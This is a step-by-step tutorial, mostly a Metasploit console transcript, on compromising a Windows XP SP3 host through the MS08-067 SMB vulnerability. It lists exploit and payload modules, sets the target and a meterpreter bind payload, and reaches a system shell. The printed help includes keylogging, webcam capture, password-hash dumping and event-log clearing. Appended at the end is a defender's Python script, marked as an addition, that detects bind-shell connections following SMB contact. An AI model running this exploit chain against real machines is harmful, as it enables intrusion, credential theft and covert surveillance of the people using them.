HOW TO EXPLOIT WINDOWS XP SP3 USING BACKTRACK 5
root@bt:~# msfconsole
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
=[ svn r14551 updated 14 days ago (2012.01.14)
Warning: This copy of the Metasploit Framework was last updated 14 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf > show exploits
Exploits
========
Name Disclosure Date Rank Description
---- --------------- ---- -----------
aix/rpc_cmsd_opcode21 2009-10-07 great AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
aix/rpc_ttdbserverd_realpath 2009-06-17 great ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
bsdi/softcart/mercantec_softcart 2004-08-19 great Mercantec SoftCart CGI
windows/mssql/mssql_payload_sqli 2000-05-30 excellent Microsoft SQL Server Payload Execution via SQL injection
windows/mysql/mysql_payload 2009-01-16 excellent Oracle MySQL for Microsoft Windows Payload Execution
windows/mysql/mysql_yassl_hello 2008-01-04 average MySQL yaSSL SSL Hello Message Buffer Overflow
windows/nfs/xlink_nfsd 2006-11-06 average Omni-NFS Server Buffer Overflow
windows/nntp/ms05_030_nntp 2005-06-14 normal Microsoft Outlook Express NNTP Response Parsing Buffer Overflow
windows/novell/groupwisemessenger_client 2008-07-02 normal Novell GroupWise Messenger Client Buffer Overflow
windows/novell/nmap_stor 2006-12-23 average Novell NetMail <= 3.52d NMAP STOR Buffer Overflow
windows/novell/zenworks_desktop_agent 2005-05-19 good Novell ZENworks 6.5 Desktop/Server Management Overflow
windows/oracle/extjob 2007-01-01 excellent Oracle Job Scheduler Named Pipe Command Execution
windows/oracle/osb_ndmp_auth 2009-01-14 good Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow
windows/oracle/tns_arguments 2001-06-28 good Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
windows/oracle/tns_auth_sesskey 2009-10-20 great Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
windows/oracle/tns_service_name 2002-05-27 good Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
windows/pop3/seattlelab_pass 2003-05-07 great Seattle Lab Mail 5.5 POP3 Buffer Overflow
windows/postgres/postgres_payload 2009-04-10 excellent PostgreSQL for Microsoft Windows Payload Execution
windows/proxy/bluecoat_winproxy_host 2005-01-05 great Blue Coat WinProxy Host Header Overflow
windows/proxy/ccproxy_telnet_ping 2004-11-11 average CCProxy <= v6.2 Telnet Proxy Ping Overflow
windows/proxy/proxypro_http_get 2004-02-23 great Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow
windows/proxy/qbik_wingate_wwwproxy 2006-06-07 good Qbik WinGate WWW Proxy Server URL Processing Overflow
windows/scada/citect_scada_odbc 2008-06-11 normal CitectSCADA/CitectFacilities ODBC Buffer Overflow
windows/scada/codesys_web_server 2011-12-02 normal SCADA 3S CoDeSys CmpWebServer <= v3.4 SP4 Patch 2 Stack Buffer Overflow
windows/scada/daq_factory_bof 2011-09-13 good DaqFactory HMI NETB Request Overflow
windows/scada/factorylink_csservice 2011-03-25 normal Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
windows/scada/factorylink_vrn_09 2011-03-21 average Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow
windows/scada/iconics_genbroker 2011-03-21 good Iconics GENESIS32 Integer overflow version 9.21.201.01
windows/scada/iconics_webhmi_setactivexguid 2011-05-05 good ICONICS WebHMI ActiveX Buffer Overflow
windows/scada/igss9_igssdataserver_listall 2011-03-24 good 7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Buffer Overflow
windows/scada/igss9_igssdataserver_rename 2011-03-24 normal 7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow
windows/scada/igss9_misc 2011-03-24 excellent 7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities
windows/scada/moxa_mdmtool 2010-10-20 great MOXA Device Manager Tool 2.1 Buffer Overflow
windows/scada/procyon_core_server 2011-09-08 normal Procyon Core Server HMI <= v1.13 Coreservice.exe Stack Buffer Overflow
windows/scada/realwin 2008-09-26 great DATAC RealWin SCADA Server Buffer Overflow
windows/scada/realwin_on_fc_binfile_a 2011-03-21 great DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow
windows/scada/realwin_on_fcs_login 2011-03-21 great RealWin SCADA Server DATAC Login Buffer Overflow
windows/scada/realwin_scpc_initialize 2010-10-15 great DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow
windows/scada/realwin_scpc_initialize_rf 2010-10-15 great DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow
windows/scada/realwin_scpc_txtevent 2010-11-18 great DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow
windows/scada/scadapro_cmdexe 2011-09-16 excellent Measuresoft ScadaPro <= 4.0.0 Remote Command Execution
windows/scada/winlog_runtime 2011-01-13 great Sielco Sistemi Winlog Buffer Overflow
windows/sip/aim_triton_cseq 2006-07-10 great AIM Triton 1.0.4 CSeq Buffer Overflow
windows/sip/sipxezphone_cseq 2006-07-10 great SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
windows/sip/sipxphone_cseq 2006-07-10 great SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
windows/smb/ms03_049_netapi 2003-11-11 good Microsoft Workstation Service NetAddAlternateComputerName Overflow
windows/smb/ms04_007_killbill 2004-02-10 low Microsoft ASN.1 Library Bitstring Heap Overflow
windows/smb/ms04_011_lsass 2004-04-13 good Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
windows/smb/ms04_031_netdde 2004-10-12 good Microsoft NetDDE Service Overflow
windows/smb/ms05_039_pnp 2005-08-09 good Microsoft Plug and Play Service Overflow
windows/smb/ms06_025_rasmans_reg 2006-06-13 good Microsoft RRAS Service RASMAN Registry Overflow
windows/smb/ms06_025_rras 2006-06-13 average Microsoft RRAS Service Overflow
windows/smb/ms06_040_netapi 2006-08-08 good Microsoft Server Service NetpwPathCanonicalize Overflow
windows/smb/ms06_066_nwapi 2006-11-14 good Microsoft Services MS06-066 nwapi32.dll
windows/smb/ms06_066_nwwks 2006-11-14 good Microsoft Services MS06-066 nwwks.dll
windows/smb/ms06_070_wkssvc 2006-11-14 manual Microsoft Workstation Service NetpManageIPCConnect Overflow
windows/smb/ms07_029_msdns_zonename 2007-04-12 manual Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruption
windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
windows/smb/ms10_061_spoolss 2010-09-14 excellent Microsoft Print Spooler Service Impersonation Vulnerability
windows/smb/netidentity_xtierrpcpipe 2009-04-06 great Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow
windows/smb/psexec 1999-01-01 manual Microsoft Windows Authenticated User Code Execution
windows/smb/smb_relay 2001-03-31 excellent Microsoft Windows SMB Relay Code Execution
windows/smb/timbuktu_plughntcommand_bof 2009-06-25 great Timbuktu <= 8.6.6 PlughNTCommand Named Pipe Buffer Overflow
windows/smtp/mailcarrier_smtp_ehlo 2004-10-26 good TABS MailCarrier v2.51 SMTP EHLO Overflow
windows/smtp/mercury_cram_md5 2007-08-18 great Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
windows/smtp/ms03_046_exchange2000_xexch50 2003-10-15 good MS03-046 Exchange 2000 XEXCH50 Heap Overflow
windows/smtp/njstar_smtp_bof 2011-10-31 normal NJStar Communicator 3.00 MiniSMTP Server Remote Exploit
windows/smtp/wmailserver 2005-07-11 average SoftiaCom WMailserver 1.0 Buffer Overflow
windows/smtp/ypops_overflow1 2004-09-27 average YPOPS 0.6 Buffer Overflow
windows/ssh/freeftpd_key_exchange 2006-05-12 average FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
windows/ssh/freesshd_key_exchange 2006-05-12 average FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
windows/ssh/putty_msg_debug 2002-12-16 normal PuTTy.exe <= v0.53 Buffer Overflow
windows/ssh/securecrt_ssh1 2002-07-23 average SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow
windows/ssl/ms04_011_pct 2004-04-13 average Microsoft Private Communications Transport Overflow
windows/telnet/gamsoft_telsrv_username 2000-07-17 average GAMSoft TelSrv 1.5 Username Buffer Overflow
windows/telnet/goodtech_telnet 2005-03-15 average GoodTech Telnet Server <= 5.0.6 Buffer Overflow
windows/tftp/attftp_long_filename 2006-11-27 average Allied Telesyn TFTP Server 1.9 Long Filename Overflow
windows/tftp/dlink_long_filename 2007-03-12 good D-Link TFTP 1.0 Long Filename Buffer Overflow
windows/tftp/futuresoft_transfermode 2005-05-31 average FutureSoft TFTP Server 2000 Transfer-Mode Overflow
windows/tftp/opentftp_error_code 2008-07-05 average OpenTFTP SP 1.4 Error Packet Overflow
windows/tftp/quick_tftp_pro_mode 2008-03-27 good Quick FTP Pro 2.1 Transfer-Mode Overflow
windows/tftp/tftpd32_long_filename 2002-11-19 average TFTPD32 <= 2.21 Long Filename Buffer Overflow
windows/tftp/tftpdwin_long_filename 2006-09-21 great TFTPDWIN v0.4.2 Long Filename Buffer Overflow
windows/tftp/threectftpsvc_long_mode 2006-11-27 great 3CTftpSvc TFTP Long Mode Buffer Overflow
windows/unicenter/cam_log_security 2005-08-22 great CA CAM log_security() Stack Buffer Overflow (Win32)
windows/vnc/realvnc_client 2001-01-29 normal RealVNC 3.3.7 Client Buffer Overflow
windows/vnc/ultravnc_client 2006-04-04 normal UltraVNC 1.0.1 Client Buffer Overflow
windows/vnc/winvnc_http_get 2001-01-29 average WinVNC Web Server <= v3.3.3r7 GET Overflow
windows/vpn/safenet_ike_11 2009-06-01 average SafeNet SoftRemote IKE Service Buffer Overflow
windows/wins/ms04_045_wins 2004-12-14 great Microsoft WINS Service Memory Overwrite
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.56.101 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
windows/adduser normal Windows Execute net user /ADD
windows/dllinject/bind_ipv6_tcp normal Reflective Dll Injection, Bind TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp normal Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp normal Reflective Dll Injection, Bind TCP Stager
windows/dllinject/reverse_http normal Reflective Dll Injection, Reverse HTTP Stager
windows/dllinject/reverse_ipv6_http normal Reflective Dll Injection, Reverse HTTP Stager (IPv6)
windows/dllinject/reverse_ipv6_tcp normal Reflective Dll Injection, Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp normal Reflective Dll Injection, Reverse TCP Stager
windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns normal Reflective Dll Injection, Reverse TCP Stager (DNS)
windows/download_exec normal Windows Executable Download and Execute
windows/exec normal Windows Execute Command
windows/loadlibrary normal Windows LoadLibrary Path
windows/messagebox normal Windows MessageBox
windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager (IPv6)
windows/meterpreter/reverse_ipv6_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (IPv6)
windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager
windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager
windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)
windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)
windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager
windows/shell/reverse_http normal Windows Command Shell, Reverse HTTP Stager
windows/shell/reverse_ipv6_http normal Windows Command Shell, Reverse HTTP Stager (IPv6)
windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager
windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS)
windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline
windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline
windows/speak_pwned normal Windows Speech API - Say "You Got Pwned!"
windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6)
windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager
windows/upexec/reverse_http normal Windows Upload/Execute, Reverse HTTP Stager
windows/upexec/reverse_ipv6_http normal Windows Upload/Execute, Reverse HTTP Stager (IPv6)
windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager
windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS)
windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager
windows/vncinject/reverse_http normal VNC Server (Reflective Injection), Reverse HTTP Stager
windows/vncinject/reverse_ipv6_http normal VNC Server (Reflective Injection), Reverse HTTP Stager (IPv6)
windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > check
[*] Verifying vulnerable status... (path: 0x0000005a)
[+] The target is vulnerable.
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:39401 -> 192.168.56.101:4444) at 2012-01-28 11:06:22 +0700
meterpreter > ?
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
detach Detach the meterpreter session (for http/https)
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
meterpreter > sysinfo
Computer : VICTIM-141A1470
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > shell
Process 424 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
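
A defender's view of the session above, as an added example that is not part of the original page: the exploit reaches the target over SMB (RPORT 445) and the bind_tcp handler then connects to a new listener on the same host (port 4444 in the session), so the script flags any allowed connection to a port outside a host's expected listeners that closely follows SMB contact from the same peer. The log format, the baseline port set and the 60-second window are assumptions, the sample lines are constructed, and the rule deliberately generalizes from port 4444 to any unexpected listener.

```python
import re
from datetime import datetime, timedelta

# Constructed sample connection log (hypothetical format; addresses reuse the
# lab range shown in the session, the other hosts and times are made up).
SAMPLE_LOG = """\
2012-01-28T11:05:02 TCP 192.168.56.20:51512 -> 192.168.56.101:445 ALLOW
2012-01-28T11:05:40 TCP 192.168.56.20:51530 -> 192.168.56.101:139 ALLOW
2012-01-28T11:06:20 TCP 192.168.56.1:39398 -> 192.168.56.101:445 ALLOW
2012-01-28T11:06:22 TCP 192.168.56.1:39401 -> 192.168.56.101:4444 ALLOW
2012-01-28T11:09:00 TCP 192.168.56.30:40000 -> 192.168.56.101:4444 DENY
2012-01-28T11:30:00 TCP 192.168.56.1:40112 -> 192.168.56.101:3389 ALLOW
this line is malformed and must be skipped
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) TCP (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) (?P<action>ALLOW|DENY)$"
)

SMB_PORTS = {139, 445}
# Assumption: ports each monitored host is expected to listen on.
BASELINE = {"192.168.56.101": {135, 139, 445, 3389}}
# Assumption: how long after SMB contact a new listener is still suspicious.
WINDOW = timedelta(seconds=60)


def parse(log_text):
    """Parse log lines into event dicts sorted by time; skip malformed lines."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        try:
            ts = datetime.fromisoformat(m["ts"])
        except ValueError:
            continue
        events.append({
            "ts": ts,
            "src": m["src"],
            "dst": m["dst"],
            "dport": int(m["dport"]),
            "action": m["action"],
        })
    return sorted(events, key=lambda e: e["ts"])


def find_bind_shell_followups(events, baseline=BASELINE, window=WINDOW):
    """Flag allowed connections to non-baseline ports that follow SMB contact
    from the same source to the same destination within `window`."""
    last_smb = {}  # (src, dst) -> time of the latest allowed SMB connection
    alerts = []
    for e in events:
        if e["action"] != "ALLOW":
            continue  # blocked traffic never reached a listener
        key = (e["src"], e["dst"])
        if e["dport"] in SMB_PORTS:
            last_smb[key] = e["ts"]
            continue
        seen = last_smb.get(key)
        # A host with no baseline entry treats every non-SMB port as unexpected.
        expected = baseline.get(e["dst"], set())
        if seen is not None and e["dport"] not in expected and e["ts"] - seen <= window:
            alerts.append({
                "src": e["src"],
                "dst": e["dst"],
                "port": e["dport"],
                "seconds_after_smb": (e["ts"] - seen).total_seconds(),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_bind_shell_followups(parse(SAMPLE_LOG)):
        print(alert)
```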